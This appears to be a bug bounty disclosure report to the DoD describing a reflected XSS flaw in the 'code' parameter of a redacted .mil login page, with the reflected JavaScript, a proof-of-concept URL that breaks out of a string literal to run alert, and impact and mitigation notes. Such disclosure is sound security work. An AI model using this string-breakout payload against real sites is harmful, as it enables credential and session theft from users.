XSS vulnerability found in javascript code of https://███.mil

### Description Hello DoD Team I found an XSS vulnerability in the javascript code of ██████████.mil. The parameter ***code*** isn't sanitized enough to prevent an attack. If you click the following link: https://███.mil/?code=xxx';%0d%0a!!!MALICIOUS%20CODE%20HERE!!!;%0d%0avar%20x=' the output looks as following. You can see the three injection points. ```javascript <!doctype HTML> <!-- BEGIN TopCategoriesDisplay.jsp --><!-- BEGIN SSORedirect.jsp --> <script type="text/javascript"> function processUserLogon(action) { if(action == 'logon') { var e = document.getElementById("environment"); env = e.options[e.selectedIndex].value; var logonIdParam = ""; var userTypeParam = ""; if(document.getElementById("logonId") != null) { logonIdParam = "&logonId=" + document.getElementById("logonId").value; } if(document.getElementById("userType") != null) { var userType = document.getElementById("userType"); userTypeParam = "&userType=" + userType.options[userType.selectedIndex].value; } window.location.href = 'https://' + env + '/webapp/wcs/stores/servlet/ProcessUserSSO?catalogId=10051&langId=-1&storeId=' + 10801 + '&sso=true&ssoAction=' + action + '&code=xxx'; !!!MALICIOUS CODE HERE!!!; var x='' + logonIdParam + userTypeParam + '&uoa=' + '&dodaac=' + document.getElementById('dodaac').value + '&json=' + document.getElementById('json').value; } else { window.location.href = 'ProcessUserSSO?catalogId=10051&langId=-1&sso=true&ssoAction=' + action + '&code=xxx'; !!!MALICIOUS CODE HERE!!!; var x=''; } } function getCode() { var clientId = "█████████"; window.location.href = 'https://███████/portal/oauth2/authorize?response_type=code&client_id=' + clientId + '&redirect_uri=https://███.mil/webapp/wcs/stores/servlet/en/███?sso=true'; } </script> <script type="text/javascript"> ra2 = "false"; if ((document.referrer.indexOf('-ra2.') !== -1)) { ra2 = "true"; } var clientId = "████████"; window.location.href = 'ProcessUserSSO?catalogId=10051&langId=-1&app='+clientId+'&ra2='+ra2+'&ssoAction=logon&code=xxx'; !!!MALICIOUS CODE HERE!!!; var x='&uoa='; </script> <!-- END SSORedirect.jsp --><!-- END TopCategoriesDisplay.jsp --> </html> ``` ### Proof of Concept https://███████.mil/?code=xxx';alert`XSS`;var%20x=' ## Impact An XSS attack on a login page can lead to credential theft, session hijacking, and user redirection to phishing sites, compromising sensitive data. Malicious scripts can capture user inputs, modify form actions, or steal session cookies, enabling attackers to impersonate victims. Implementing input validation, output encoding, and a strong Content Security Policy (CSP) can mitigate these risks. ## System Host(s) ███████.mil ## Affected Product(s) and Version(s) Webserver ## CVE Numbers ## Steps to Reproduce ###use the link: https://███████.mil/?code=xxx';alert`XSS`;var%20x=' ## Suggested Mitigation/Remediation Actions sanitize the character ' ``` bash ' ===> \' ``` should do it